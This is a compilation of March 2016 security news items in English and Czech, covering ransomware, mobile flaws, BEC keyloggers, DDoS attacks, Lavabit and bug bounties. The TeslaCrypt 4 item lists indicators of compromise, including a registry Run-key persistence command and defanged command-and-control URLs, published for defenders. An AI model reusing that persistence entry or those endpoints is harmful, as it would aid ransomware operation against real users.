The Danish hacker academy provides a training program includes three modules spread across four and a half months.

The first one is a basic module on the network and computer security, the second one is a module on defensive hacking, and the training closes teaching offensive hacking techniques to the participants.

The Danish hacker academy will be located in Copenhagen, but its location is still a mystery, all the participants that will successfully complete the training will be enrolled in PET’s Computer Network Exploitation team. But beware, only a privileged few will be selected annually.

“The selection process will be supervised by psychologists and PET’s own IT specialists and is based on the same recruitment process used for the elite commando frogman corps of the Royal Danish Navy.” states a post published by the PET online.

“Officially termed ‘network retrieval‘, in reality the recruits would be helping PET with cyber espionage against foreign powers, writes Politiken – a type of activity that would normally get you sent to prison.“

The experts at PET have no doubt, the Danish hacker academy will provide hacking excellences, high-skilled hackers that will form a new cyber army operating abroad and inside the country.


Metaphor – nová hrozba pro uživatele Androidů

21.3.2016 Viry
Další problém s multimediální knihovnou Androidu ohrožuje možná desítky milionů uživatelů.

Stagefright opět představuje riziko. Miliony zařízení s Androidem jsou opět v ohrožení poté, co byl objeven nový způsob jak zneužít díru v knihovně multimédií, kterou už Google v minulosti záplatoval.

Izraelská bezpečnostní společnost NorthBit slabinu pojmenovala Metaphor a zranitelná jsou podle ní všechna zařízení s Androidem 2.2, přes 4.0 až po 5.0 a 5.1. Nejvíc prý smartphony Nexus 5 se stock ROM a s určitými modifikacemi také HTC One, LG G3 a Samsung S5.

Jde přitom o podobnou chybu, jakou představovala ta s označením CVE-2015-3864, která byla poprvé objevena zkraje loňského roku bezpečnostní společností Zimperium. Google ji už dvakrát napravoval, přičemž podruhé tak s ohledem na možné ohrožení učinil relativně v tichosti.

Podle Zuka Avrahama, zakladatele Zimperia, tak aktuální report kolegů z NorthBit představuje značné riziko, jelikož jej mohou hackeři snáz zneužít. Zvlášť poté, co NorthBit postup úspěšného prolomení bezpečnostní chyby zveřejnil na videu.

Nic netušícímu uživateli stačí kliknout na škodlivý link a chvíli na dané webové stránce pobýt – společnost uvádí pár vteřin až dvě minuty – než škodlivý kód vykoná své dílo. Na zařízeních s Androidem 5.0 a 5.1 přitom zvládne prolomit i ASLR, tedy opatření, které má podobným útokům bránit.

Podle odhadů NorthBitu Android 5.0 a 5.1 v současnosti běží na zhruba 235 milionech zařízení, Android verze 2.x bez ASLR pak na 40 milionech zařízení. „Těžko ale odhadnout, kolik jich je vlastně v ohrožení,“ píše ve své zprávě.

Google loni v srpnu pod vlivem hrozby Stagefrightu přislíbil pravidelnější vydávání patchů a užší spolupráci s výrobci mobilních zařízení a i když nepřicházejí tak pravidelně, jak by někteří uživatelé očekávali, dá se předpokládat, že na aktuální problém zareaguje pohotově.

„Pro komunitu Androidářů představuje záplatování podobných chyb obzvlášť velkou výzvu. Na vývojáře i výrobce je vyvíjen velký tlak, aby takové chyby rychle napravovali,“ říká Chris Eng, viceprezident společnosti Veracode.


Nový trojský kůň terorizuje uživatele iPhonů a iPadů

21.3.2016 Viry
Počítačoví piráti se v poslední době zaměřují na uživatele Applu stále častěji. V uplynulých týdnech trápil uživatele operačního systému vyděračský virus KeRanger, nově se trojský kůň AceDeceiver zaměřuje na chytré telefony a počítačové tablety s logem nakousnutého jablka. Upozornil na to server Hot for Security.
Nový škodlivý kód objevili výzkumníci ze společnosti Palo Alto Networks. Podle nich jde mimochodem o vůbec prvního trojského koně pro platformu iOS, tedy pro mobilní operační systém společnosti Apple.

Bezpečnostní experti upozorňují na to, že nezvaný návštěvník se dokáže šířit i na zařízeních, na kterých nebyl proveden tzv. jailbreak. Jde v podstatě o odemčení chytrého telefonu nebo počítačového tabletu, aby do něj bylo možné instalovat aplikaci i z neoficiálních zdrojů.

Právě tak se totiž škodlivé kódy na iPhonech a iPadech šířily nejčastěji. Trojský kůň AceDeceiver však jailbreak nepotřebuje, zopakujme, že se dokáže šířit i na neodemčených přístrojích.

Zadní vrátka do systému
V nich pak dokáže udělat poměrně velkou neplechu. Otevře totiž kyberzločincům zadní vrátka do systému, čímž jim zpřístupní nejen nastavení, ale také uživatelská data.

Jak se tedy záškodník do mobilu nebo tabletu dostane? Počítačoví piráti spoléhají na to, že si uživatelé budou chtít stahovat aplikace nejen prostřednictvím svého mobilního telefonu, ale také prostřednictvím počítače s Windows, ke kterému se iPhone či iPad jednoduše připojí prostřednictvím aplikace iTunes.

AceDeceiver se podle výzkumníků z Palo Alto Networks šíří už od poloviny loňského roku, objeven byl však až nyní. Aktuálně mají výzkumníci k dispozici tři programy, které tohoto záškodníka obsahují a nabízely se prostřednictvím oficiálního obchodu s App Store.

Bezpečnostní experti zástupce společnosti Apple na výskyt nebezpečných aplikací upozornili ještě před zveřejněním celé kauzy. V současnosti tak již není nakažené programy možné stáhnout.

Nabízí se ale otázka, zda se výzkumníkům podařilo odhalit všechny nakažené aplikace. Nebo zda naopak ještě nějaká číhá na uživatele v obchodu App Store.

Vyděrači cílí na Mac OS X
Zkraje března se počítačoví piráti zaměřili také na majitele počítačů s operačním systémem Mac OS X. Virem KeRanger mohli uživatelé své stroje nakazit, pokud do nich nainstalovali aplikaci pro stahování torrentů Transmission. Právě v ní se nezvaný návštěvník ukrýval.

První tři dny si oběti vyděračského viru patrně ani nevšimly, že je něco v nepořádku. Zůstal totiž schovaný na pozadí a vyčkával na svou příležitost. Teprve po zmiňovaných 72 hodinách se aktivoval a začal v operačním systému Mac OS X pěknou neplechu.

Stejně jako na platformě Windows zašifruje uložená data na pevném disku. Útočníci pak za jejich zpřístupnění požadují výkupné ve výši 10 000 korun.


Hacking Tesla Model S, too much noise around a great research
21.3.2016 Hacking

Last week at the CeBIT the Lookout’s Co-Founder and CTO Kevin Mahaffey talked about hacking Tesla Model S providing indications on possible countermeasures.
Last week at the CeBIT conference held in Hanover, the Lookout’s Co-Founder and CTO Kevin Mahaffey talked about hacking Tesla Model S providing indications on possible countermeasures. Unfortunately, many security professionals provided highlighted that Mahaffey has forgotten to mention half of his team, looking like he was taking the credit to himself.

These type of work made by researchers should be seen as “doing the world a service” since researchers are making cars more secure, of course, they are hacking them, but they are also finding solutions to the problems.

Tesla, besides having great cars, have also great policies that ensure that the car security is a company high priority, for this reason, they are encouraging the hacker community to hack their vehicles and disclose vulnerabilities they would find.

The reason why Kevin Mahaffey and Marc Rogers focused in hacking Tesla models, is that the company is making new model, build from scratch, and these type of cars will be common everywhere in the near future.

Even if everything made by Kevin and his team looks easy, it took them many years of research to get to the point in the presentation that they can “control” the Model S.

In the las year Kevin and Marc gave made a presentation at the DEFCON conference, the findings of their research helped Tesla to discover problems in his cars and contributed to improve the image of the company that is perceived by the experts as a research-friendly company.

Coming back to the presentation in CeBIT on hacking Tesla, many people took the title “Why I Hacked the Tesla Model S” and focused in the “I” part, looking like Kevin Mahaffey was pushing all the credit to himself.

CSO tried to reach Marc Rogers to talk about this problem, but Rogers declined to comment. No one at Lookout was aware of any problem related to the presentation or presentation title, and when the issue came to their attention, they blamed CeBIT.

In an e-mail a spokesperson of Lookout said:

“disappointing that CeBIT positioned Kevin and Marc’s research in such a way that excluded recognition of Marc’s extremely hard work.”

“It was absolutely a collaboration between the two of them and Kevin does make that clear in his CeBIT presentation,”

And if you see that presentation you know it’s true, at a certain point kevin says:

“Why did I undertake this research? It was myself Kevin Mahaffey and my research partner Marc Rogers, we’ve been working on this project for several years…”

In addition, Kevin showed a photo of Marc during the process of stopping the Model S.

In another e-mail exchange with CSO, Kevin says he offered an apology and stated that he feels terrible that Rogers would feel slighted by the incident.

Lookout says they were “caught the misleading title, and apologize failing to do so. “ and already asked CeBIT to correct the article/presentation.

Let me suggest see the interesting presentation made at the Cebit conference.


A iOS zero-day allows iCloud photos and videos decryption
21.3.2016 iOS

A group of researchers found an iOS zero-day that would let a skilled attacker decrypt photos and videos that were sent as secure instant messages.
The bad news is that Matthew Green, a professor at Johns Hopkins University revealed that a zero-day vulnerability in iOS encryption allows skilled attackers to decrypt intercepted iMessages, the good news is that the flaw is very hard to exploit.

Green explains that he suspected the flaw when reading Apple documentation related to the encryption scheme implemented in its messaging system.

The popular expert Matthew Green hasn’t provided the details of the exploit to give the opportunity for Apple for fixing it. The expert also added that the flaw would not have helped the US government in the case of the San Bernardino shutter’s iPhone.

The hacking technique could be used by law enforcement only to access photos and videos sent by suspects using iMessage.

iPhone 6 iOS zero-day

“This specific flaw in Apple’s iMessage platform likely would not have helped the FBI pull data from an iPhone recovered in December’s San Bernardino, Calif., terrorist attack, but it shatters the notion that strong commercial encryption has left no opening for law enforcement and hackers, said Matthew D. Green, a computer science professor at Johns Hopkins University who led the research team.” states The Washington Post that interviewed Green.

“Even Apple, with all their skills — and they have terrific cryptographers — wasn’t able to quite get this right,” said Green.“So it scares me that we’re having this conversation about adding back doors to encryption when we can’t even get basic encryption right.”

Green explained that with the support of his group of experts, composed of Ian Miers, Christina Garman, Gabriel Kaptchuk, and Michael Rushanan could guess the key that could be used to decrypt photos and videos stored in the iCloud.

The team of researchers wrote an application that emulated an Apple server and then targeted an encrypted photo stored on the iCloud. The software sent key digit guesses to an iPhone running an old version of iOS, which in turn indicated when each key of its 64 digits was correct.

Green highlighted that its attack technique could very dangerous if conducted by a persistent attacker, like a nation-state attacker.

The iOS 9.3 beta version seems to be unaffected and will be released as stable shortly.

Apple partially fixed the zero-day vulnerability with the iOS 9 release.


Hackers brought down the websites of principal Swedish Newspapers
21.3.2016 Hacking

The online editions of principal Swedish newspapers were knocked out for several hours by a cyber attack during the weekend.
The websites if a Swedish were shut down in the weekend due to an “extremely dangerous and serious” cyber attack.

The websites hit by the hackers are the Dagens Nyheter, Svenska Dagbladet, Expressen, Aftonbladet, Dagens Industri, Sydsvenskan and Helsingborgs Dagblad. The website went down on Saturday evening from about 19:00 GMT until about 22:00 GMT.

The news was confirmed by the head of the Swedish Media Publishers’ Association, Jeanette Gustafsdotter, in an interview with the Swedish news agency TT.

“To threaten access to news coverage is a threat to democracy,” she said.
At the time I was writing no one has claimed responsibility for the cyber attack and there are no details about the attacks. Experts speculate that threat actors coordinated a distributed denial-of-services (DDoS) attacks against the websites of the Swedish media agencies.

Immediately before the attacks a Twitter account posted the following messages:

“The following days attacks against the Swedish government and media spreading false propaganda will be targeted” tweeted @_notJ.

Swedish newspaper website hacked

“This is what happends when you spread false propaganda. Aftonbladet.se #offline @Aftonbladet” states another Tweet.

Swedish newspaper website hacked 2

The Swedish Police and the intelligence are investigating the case. According to several sources on the Internet, the attacks originated from Russia.


Olympic Vision BEC attacks target businesses worldwide with keyloggers
20.3.2016 Crime

Trend Micro discovered a Business Email Compromise Campaign leveraging on the Olympic Vision keylogger that targets Middle East and Asia Pacific Companies.
A new malware-based campaign is targeting key employees from companies in the US, Middle East and Asia. The attackers are using malware in a classic business email compromise (BEC) attack in order to hijacking the email accounts of the victims and authorize financial transactions on their behalf.

The attacks have been traced back to Lagos and Kuala Lumpur.

“The Business Email Compromise (BEC) is a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that regularly perform wire transfer payments. Formerly known as the Man-in-the-E-mail Scam, the BEC was renamed to focus on the “business angle” of this scam and to avoid confusion with another unrelated scam.” reports the statement issued in 2015 by Internet Crime Complaint Center (IC3) and the FBI.

In this last wave of attacks uncovered by experts at antivirus firm Trend Micro that hackers attempted to gain control of victims’ accounts to trick other employees, suppliers or business partners to perform wire transfer payments to accounts controlled by the crooks.

The cyber criminals targeted key employees at companies from 18 countries by spreading a commercial keylogger named Olympic Vision. The attackers sent to the victims malicious emails masqueraded as messages from business partners which pretend to provide information related to alleged problems occurred with a recent bank transfer of invoice.

“Olympic Vision is a keylogger malware involved in an ongoing Business Email Compromise (BEC) campaign targeting 18 companies in the US, Middle East and Asia, the majority of which coming from the two latter regions (22%, 39% and 39% respectively). Business Email Compromise attacks involve spear phishing/social engineering techniques to infect key employees’ systems with info-stealing malware and intrude upon business dealings/transactions. ” states a report published by Trend Micro.

Olympic Vision Business Email Compromise Campaign BEC

The researchers explained that the Olympic Vision keylogger is very cheap, it is available on the black market for $25, but the experts highlight that it isn’t a very advanced threat.

“Olympic Vision is the fourth malware we’ve seen used in Business Email Compromise campaigns, after Predator Pain, Limitless, and HawkEye. Similar to other BEC malware, Olympic Vision is capable of stealing a variety of information from its target, and comes with a small price tag – its toolkit can be bought for $25. ” Trend Micro wrote in a blog post.

“Olympic Vision is not advanced by any means. Like Predator Pain and Limitless, keyloggers that have been used for the very same purpose in previous BEC campaigns, it performs its main function – that is, to log keystrokes and take screenshots for the purpose of stealing personal information – well and without unneeded complexity.” continues the report.

Once installed on the victim’s machine, Olympic Vision collects information about the system configuration, login credentials saved in several applications (i.e. Email clients, browsers, FTP programs and instant messaging applications) and key strokes. The malware also gathers network information and images and text in the clipboard.

Despite the threat is not particularly advanced, it is perfect to collect information that is used by attacker to understand the accounting workflows of the targeted firms.

“We looked at the trail of Olympic Vision keyloggers being used in the wild to check for organized activity, and were able to trace the identities of the actors, and positively identified two Nigerian cybercriminals — one operating from Lagos, and the other from Kuala Lumpur,” continues the blog post.

Business Email Compromise is a serious threat to businesses that causes losses for thousand million dollars every year.


Redaction error reveals Feds ordered Lavabit to spy on Snowden
20.3.2016 Security

A redaction error in court-ordered release of the Lavabit case files confirmed that Edward Snowden was the target of the FBI.
Lavabit was an encrypted webmail service founded in 2004 by Ladar Levison, it closed on August 8, 2013 after the US authorities ordered it to turn over its Secure Sockets Layer (SSL) private keys to order government surveillance activities. The US Government was interested in spying on the Edward Snowden‘s emails.

Now a redaction error in court-ordered release of Lavabit case files confirmed that Edward Snowden was the target of the FBI that caused the termination of the secure email service.

We have now the certainty that Snowden was using the Lavabit email service and that FBI drove the company into closure because it refused to serve the US Government’s requests.

The US Government ordered to install a surveillance implant on the Lavabit servers and later to turn over Lavabit’s encryption keys allowing the Feds to access Snowden’s messages. The court order also revealed that the US Government ordered not to disclose the surveillance activity to third-party entities.

After a few weeks of legal dispute, Levison shuttered Lavabit refusing to become not become complicit in criminal surveillance operated by the US Government.

“After 38 days of legal fighting, a court appearance, subpoena, appeals and being found in contempt of court, Levison abruptly shuttered Lavabit citing government interference and stating that he would not become “complicit in crimes against the American people”.” reported the Guardian.

US authorities recently revealed the mysterious circumstances behind the Lavabit shut down by publishing a collection of case files that were not correctly redacted allowing to discover the target of the FBI activity, the email address Ed_Snowden@lavabit.com.

The document was integrally published by Cryptome, it is visible the Snowden’s email address was left unredacted.

Lavabit shuttered Edward Snowden email

The documents were publicly disclosed in the result of Levison’s battle against the US Government, he filed a motion in December that prompted the court to order the release of files related the Lavabit case.

The Lavabit founder plans to reveal what it really happened, but he is still under order not to reveal the facts … meantime the redaction error leaves no doubt about the real intent of the FBI in the Lavabit case.


Ransomware TeslaCrypt 3.0.1 posouvá vydírání dále, už nepůjde prolomit

20.3.2016 Viry

Ransomware TeslaCrypt 3.0.1 posouvá vydírání dále, už nepůjde prolomitDnes, Milan Šurkala, aktualitaVyděračský malware je na vzestupu, stává se mnohem častější hrozbou než v minulosti. Nová verze TeslaCrypt 3.0.1 opravuje chyby předchozí varianty a nyní už bude bez zaplacení výkupného nemožné se dostat k původním datům.
V posledních měsících a letech zaznamenáváme výrazný nárůst ransomware, což je vyděračský software, který zašifruje veškerá data na disku oběti a požaduje výkupné za jejich odemčení. TeslaCrypt je jeden z nejzákeřnějších a jeho nová verze 3.0.1 opravila chyby těch předchozích. Dle odborníků v oblasti bezpečnosti je šifrování tak silné, že nelze prolomit žádnou metodou (brute force je díky časové náročnosti nemyslitelný).

Minulé verze softwaru uchovaly klíč k odemčení na počítači oběti a vzniklo několik aplikací, které dokázaly zašifrovaná data odemknout (TeslaCrack, TeslaDecrypt, TeslaDecoder). Nová verze vytvoří šifrovací klíč, který je jedinečný pro každý počítač, zašifruje jím data, ale poté jej odešle na server útočníka a na postiženém počítači jej smaže. Pak nezbývá než zaplatit, přičemž není zaručeno, že útočníci vaše data skutečně rozšifrují. Situace je ještě o to horší, že ransomware často proklouzne antivirovým programům. Musíte si tedy dávat pozor na přílohy v e-mailech a ideální je také si nechávat zálohy důležitých dat.


Security Researcher Goes Missing, Who Investigated Bangladesh Bank Hack
20.3.2016 Hacking
Tanvir Hassan Zoha, a 34-year-old security researcher, who spoke to media on the $81 Million Bangladesh Bank cyber theft, has gone missing since Wednesday night, just days after accusing Bangladesh's central bank officials of negligence.
Zoha was investigating a recent cyber attack on Bangladesh's central bank that let hackers stole $81 Million from the banks' Federal Reserve bank account.
Though the hackers tried to steal $1 Billion from the bank, a simple typo prevented the full heist.
During his investigation, Zoha believed the Hackers, who are still unknown, had installed Malware on the bank's computer systems few weeks before the heist that allowed them to obtain credentials needed for payment transfers.
With the help of those credentials, the unknown hackers transferred large sums from Bangladesh's United States account to fraudulent accounts based in the Philippines and Sri Lanka.
However, at the same time, Zoha accused senior officials at Bangladesh central bank of gross negligence and weak security procedures that eventually facilitated the largest bank heist in the country.
The Central bank's governor Atiur Rahman, along with two of his deputy governors, had to quit his job over the scandal, hugely embarrassing the government and raising alarm over the security of Bangladesh's foreign exchange reserves of over US$27 Billion.
However, when the investigation was still going on, Zoha disappeared Wednesday night, while coming home with one of his friends, according to sources close to Zoha's family.
While speaking to media in the wake of the massive cyber attack, Zoha identified himself as the ICT (Information and Communication Technology) Division's cyber security expert who had worked with various government agencies in the past.

Soon after Zoha's disappearance, the government officials put out a statement but did not provide more details besides the fact that they opened an investigation.
Zoha's family members suspect that the comments Zoha made about the carelessness of bank’s officials on the Bank heist to the press on March 11 are the cause of his disappearance.


Hackers stole data from the Swiss People’s Party
20.3.2016 Hacking

The Swiss People’s Party confirmed that they have been the target of hackers who have stolen the personal data of over 50,000 individuals.
A group of hackers, which calls itself NSHC, claims to have hacked the Switzerland’s largest party, the conservative Swiss People’s Party (SVP), and stolen the personal data of over 50,000 individuals.
The cracked archive includes the names and email addresses of Swiss People’s Party supporters.
Swiss People Party
The NSHC have hacked the Swiss People’s Party to raise awareness about Switzerland’s lack of protection against cyber attacks.
Representatives of the Swiss People’s Party confirmed to 20 Minuten daily that the systems of the party were hit by a cyber attack but.

“Apparently it’s hackers succeeded in the database of svp.ch penetrate and gain access to various data, including e-mail addresses. A group that calls itself NSHC and understood as ‘Grey Hats’ has, the editors received from inside-channels.ch she wanted to show the attack, that Switzerland is not sufficiently protected against cyber attacks.” reported the website inside-it.ch.

According to the inside-it.ch website, the NSHC hacker group also launched DDoS against several Swiss online shops and the Swiss Federal Railways website (SBB) this week.

“The Swiss Federal Railways website was hard to access on Monday afternoon for about an hour and in the evening for around one and a half hours due to a DDoS attack,” Swiss Federal Railways spokesman Daniele Pallecchi told to the Swiss news agency.

According to Pascal Lamia, the head of the government’s Reporting and Analysis Center for Information Assurance (also known as MELANI), the attack on the Swiss People’s Party is not linked with cyber attacks recently observed against small enterprises and online shops.

“There is no connection with the chopped SVP sites including the DDoS attacks on web shops,” said Lamia.

The experts at MELANI confirmed to have no news about the NSHC group.
MELANI suggests people and businesses to check whether their email addresses have been hacked though an online tool available at https://www.checktool.ch.


Bored With Chess? Here's How To Play Basketball in Facebook Messenger
19.3.2016 Safety
Hope all of you have enjoyed the Game of Chess in the Facebook Messenger.
But if you're quite bored playing Chess or not really good at the game, then you probably felt a bit excited about Facebook's recent inclusion of a little Basketball mini-game into Messenger.
Now you can play Basketball through Facebook Messenger, just by typing in the Basketball emoji and sending to one of your friends. This would enable a secret Basketball mini-game between you and your friend.
Here's How to Play Basketball:
Just locate the basketball emoji from your emoji list, send to one of your friends and click it to start the game.
Once sent, you would be taken to the Basketball court in a pure white background, where there is no sidebars of any friend suggestions or any promotional ads; only appears a basketball and a hoop, nothing else!
All you have to do:
Just Swipe up and Toss the basketball into the hoop.
A single swipe on your phone in the direction of the hoop to bask in the ball. Facebook also encourages your gameplay with various emojis after each basket.
On successful basket, Game appreciates your gameplay by displaying various emojis like Thumbs Up, Hands Up, Claps and Smiles. On a miss, Game warns you by showing emojis like "Surprised", "Feared," and similar.
Messenger will also display your scores in between, based on your successful baskets. Your goal is to challenge your friend to see who can get the most consecutive baskets.
Video Demonstration
You can watch the Video Demonstration of Facebook Hidden Basketball game below:

To play this game, the Facebook users should have the latest version of Messenger installed on their mobile phone.
The addition of such mini-games into Facebook's messaging platform would be a loneliness breaker.
As this game had been unveiled after a couple of weeks of Chess, let's hope Facebook would integrate more games like caroms or snooker in its upcoming rollouts.


Anonymous claims to leak Trump ’s personal info under #OpWhiteRose
19.3.2016 Hacking

The Anonymous Hacker collective claims to publish Donald Trump’s personal information, including Social Security Number and addresses.
Alleged members of the Anonymous collective have leaked Donald Trump’s already public “private” phone numbers and other information online. The hackers have leaked also addresses, including the one of the Palm Beach residence in Florida, and social security number as part of the anti-Trump operation dubbed #OpWhiteRose.

Anonymous called the new campaign #OpWhiteRose, after a non-violent resistance group in Nazi Germany.
anonymous vs Donald Trump Operation WhiteRose
Rumors online confirm that members of Anonymous have data dumped Trump’s sensitive information, including detailed information about the Trump’s personal agent (Tracy Brennan) and legal representatives (Manatt Phelps & Phillips), whose phone numbers have now “gained publicity.”
“These are provided for informational purposes only,” states an Anonymous spokesman in a video published by the collective. “… That might be able to assist you all in independently investigating this would-be dictator.”
Analyzing the leaked data it is possible to note that released information was already publicly available, the Trump’s private phone number was shared by the presidential candidate in August on Twitter.

This week, Anonymous declared total war on Trump and his campaign, the hacker collective plans to coordinate a series of attacks on Trump’s web sites starting April 1, the April Fool’s Day.

“We have been watching you for a long time and what we’ve seen is deeply disturbing. You don’t stand for anything but your personal greed and power.”

“This is a call to arms. Shut down his websites, research and expose what he doesn’t want the public to know. We need you to dismantle his campaign and sabotage his brand.”“We need to dismantle his campaign and sabotage his brand,” said the Anonymous spokesman.

“We need to dismantle his campaign and sabotage his brand,” said Athe nonymous spokesman.
A few weeks ago, alleged members of the Anonymous group hacked the Donald Trump ‘s voicemails. Journalist at Gawker received an email by the hackers containing recordings from Donald Trump ‘s voicemail inbox.

The hacktivist group first threatened Trump with war in December, when he said he would look to ban all Muslims from entering the United States.
The data were published on Pastebit.


Apple Engineers say they may Quit if ordered to Unlock iPhone by FBI
19.3.2016 Apple
Apple Vs. FBI battle over mobile encryption case is taking more twists and turns with every day pass by.
On one hand, the US Department of Justice (DOJ) is boldly warning Apple that it might compel the company to hand over the source code of its full iOS operating system along with the private electronic signature needed to run a modified iOS version on an iPhone, if…
…Apple does not help the Federal Bureau of Investigation (FBI) unlock iPhone 5C belonging to one of the San Bernardino terrorists.
And on the other hand, Apple CEO Tim Cook is evident on his part, saying that the FBI wants the company to effectively create the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
Now, some Apple engineers who actually develop the iPhone encryption technology could refuse to help the law enforcement break security measures on iPhone, even if Apple as a company decides to cooperate with the FBI.
Must Read: FBI Director – What If Apple Engineers are Kidnapped and Forced to Write (Exploit) Code?
Apple Emplyees to Quit their Jobs
Citing more than a half-dozen current and former Apple engineers, The New York Times report claims that the engineers may refuse the work or even "quit their jobs" if a court order compels them to create a backdoor for the very software they once worked to secure.
"Apple employees are already discussing what they will do if ordered to help law enforcement authorities," reads the report. "Some say they may balk at the work, while others may even quit their high-paying jobs rather than undermine the security of the software they have already created."
Apple previously said that building a new backdoored version of iOS to satisfy the FBI's demand would require up to a month of work and a team of 6-10 engineers, naturally Apple's top software engineers.
Also Read: Apple is working on New iPhone Even It Can't Hack.
However, Apple employees said they already have "a good idea who those employees would be." They include:
A former aerospace engineer who developed software for the iPhone, iPad and Apple TV.
A senior quality-assurance engineer who is an expert "bug catcher" with experience in testing Apple products.
An employee specializes in security architecture for the operating systems powering Apple products including iPhone, Mac and Apple TV.
The FBI wants Apple assistant to help the authorities bypass security mechanisms on the San Bernardino shooter Syed Farook's iPhone 5C so that they can extract data from the phone.
Given that the San Bernardino case is currently working its way through the courts and that no one is prepared to stand down, the possibility that Apple might have to comply with the orders is probably years away.


Be aware the unbreakable TeslaCrypt 4 was detected in the wild
19.3.2016 Virus

According to the experts at Heimdal Security firm, the ransomware Teslacrypt 4 arrived and it is infecting systems in the wild.
According to the experts at Heimdal Security, the fourth version of the infamous Teslacrypt ransomware has just been launched. Teslacrypt 4 implements new functionalities and is more stable of previous versions, stability, it also fixed various bugs, including one related to encryption of large data files. In the previous variants, files larger than 4 GB would get permanently damaged when the ransomware tried to encrypt them.

Teslacrypt 4 used RSA 4096 for data encryption, this makes impossible to recover data encrypted by the ransomware.

“Consequently, the encrypted data will be impossible to recover, which can determine information loss if the victim doesn’t have a backup for the affected data.” states a report published by Heimdal Security.

The bad news for the victims is that the TeslaDecoder tool used to rescue the files encrypted by the previous variants of the ransomware no longer works with Teslacrypt 4.0.

Victims of the Teslacryt 4 ransomware have to possibility to recover information, they can only restore files from a previous backup or pay the ransom with no guarantee of success.

Researchers spotted TeslaCrypt 4 in the wild, crooks used drive-by attacks to spread the ransomware leveraging on the Angler exloit kit.

The researchers already blocked more than 600 domains hosting the Angler EK in just one day. It has been estimated that daily average of domain spreading Angler EK blocked by the security firsm will reach soon 1200 domains per day, on average.

Teslacrypt 4

Teslacrypt 4 could be also used by attackers to harvest user’s data, including the “MachineGuid”, “DigitalProductID” and “SystemBiosDate” .

Experts at Heimdal Security have published the following Indicators of Compromise for the Teslacrypt 4.0:

%UserProfile%\Desktop\RECOVER[%5 random signs%].html
%UserProfile%\Desktop\RECOVER[%5 random signs %].png
%UserProfile%\Desktop\RECOVER[%5 random signs %].txt %UserProfile%\Documents\[random file name].exe %UserProfile%\Documents\recover_file.txt

TeslaCrypt 4 also creates the following value in the registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\_[random name] C:\Windows\SYSTEM32\CMD.EXE /C START %user account%\Documents\[random name].exe

The current list of Teslacrypt 4 Control & Command servers is the folowing:

http://commonsenseprotection[.]com/phsys.php
http://ebookstoreforyou[.]com/phsys.php
http://esbook[.]com/phsys.php
http://exaltation[.]info/plugins/phsys.php
http://hmgame[.]net/phsys.php
http://shampooherbal[.]com/phsys.php

This new variant of TeslaCrypt demosntrates the rapid evolution of the threat that first appeared in March 2015, meanwhile the version 2.o appeared in the wild in July 2015 and the TeslaCrypt 3.0 in January 2016.


SCADA hacking – Hackers with ability to cut the power is a real threat
19.3.2016 Hacking

The Ukranian power blackout has demonstrated the worrying effects of the SCADA hacking, other countries like UK fear similar attacks.
All the warnings from security experts throughout the years have unfortunately been disregarded, when it comes to the hackers’ threats in strategical spots, such as that of power generation. As a result, hackers have acted according to their own agenda and they have taken the world by storm.

As a result, hackers have acted according to their own agenda and they have taken the world by storm. On 23 December 2015, Ukraine suffered from an overall power blackout and that caused great distress to the people. Prykarpattyaoblenergo lost more than 30 substations, causing havoc in return. And the most frustrating thing of them all: the power stations have not yet been completely fixed. The reason is that the malware used by hackers in Ukraine for the power outing erased key files.

What does this say about security online?

The reason is that the malware used by hackers in Ukraine for the power outing erased key files. What does this say about security online?

The malware used is called “Killdisk” and was the outcome of a well-organized effort to gain control over the computers of the stations. Files appeared to the people working for the power company, attached by their “friends” – making it easier for them to open. Instead of files sent by their friends, the malware was installed into the computers and caused all these grave consequences.

SCADA hacking uk power grid

On the bright side, this must have taken a lot of time and therefore, it is not the main tactic used by hackers in similar cases. However, it is always possible to happen again!

The bad news is that there are alternative ways for hackers to get inside similar systems, according to Sergey Gordeychik, who helps with Scada Strangelove, the community of experts working on discovering the faults of ICS systems.

“We can discover more than 80,000 different kinds of ICS systems connected to the internet directly,” Gordeychik told the BBC.

As a result, the ICS systems do not have the power to defend themselves against an attack. This is really frustrating, as there are ways for them to enhance online security and avoid these phenomena. The purpose of Scada Strangelove, according to Mr. Gordeychik, aims at changing that:

“The main idea is to raise awareness and to force vendors to create more secure-by-design systems.”

UK infrastructure is being scrutinized by Crest these days, trying to identify such potential threats online. According to what Ian Glover from Crest said:

“The single biggest vulnerability is connecting poorly protected corporate IT to operational technologies,” and so this is where they have focused on. “It’s much easier to exploit the corporate IT because there are so many tools you can download and use to do that,”

Of course, the aim of every security researcher out there in the UK is to enhance online security and raise awareness on such a threatening phenomenon that could blow up the structure of a whole country within minutes. Although there is a reasonable ground of worrying about what can happen in case of SCADA hacking, proper capability and intent can lead to sufficient defense against hacking threats for the UK and the world – hopefully!


How to Make $100,000? Just Hack Google Chromebook
19.3.2016 Hacking

Yes, you could earn $100,000 if you have the hacking skills and love to play with electronics and gadgets.
Google has doubled its top bug bounty for hackers who can crack its Chromebook or Chromebox machine over the Web.
So if you want to get a big fat check from Google, you must have the ability to hack a Chromebook remotely, that means your exploit must be delivered via a Web page.
How to Earn $100,000 from Google
The Chrome security team announced Monday that the top Prize for hacking Chromebook remotely has now been increased from $50,000 at $100,000 after nobody managed to successfully hack its Chromebook laptops last year.
The Top bug bounty will be payable to the first person – the one who executes a 'persistent compromise' of the Chromebook while the machine is in Guest Mode.
In other words, the hacker must be able to compromise the Chromebook when the machine is in a locked-down state to ensure its user privacy.
Moreover, the hack must still work even when the system is reset.
"Last year we introduced $50,000 rewards for the persistent compromise of a Chromebook in guest mode," the Google Security Blog reads.
"Since we introduced the $50,000 reward, we have not had a successful submission. Great research deserves great awards, so we're putting up a standing [6-figure] sum, available all year round with no quotas and no maximum reward pool."
Bug bounties have become an essential part of information security and have been offered by major Silicon Valley companies to hackers and security researchers who discover vulnerabilities in their products or services.
Last year, Google paid out more than $2,000,000 in bug bounties overall to hackers and researchers who found bugs across its services – including $12,000 to Sanmay Ved, an Amazon employee, who managed to buy Google.com domain.
So Keep Hunting, Keep Earning!


The Best Way to Send and Receive End-to-End Encrypted Emails
19.3.2016 Security
How many of you know the fact that your daily e-mails are passaged through a deep espionage filter?
This was unknown until the whistleblower Edward Snowden broke all the surveillance secrets, which made privacy and security important for all Internet users than ever before.
I often get asked "How to send encrypted email?", "How can I protect my emails from prying eyes?" and "Which is the best encrypted email service?".
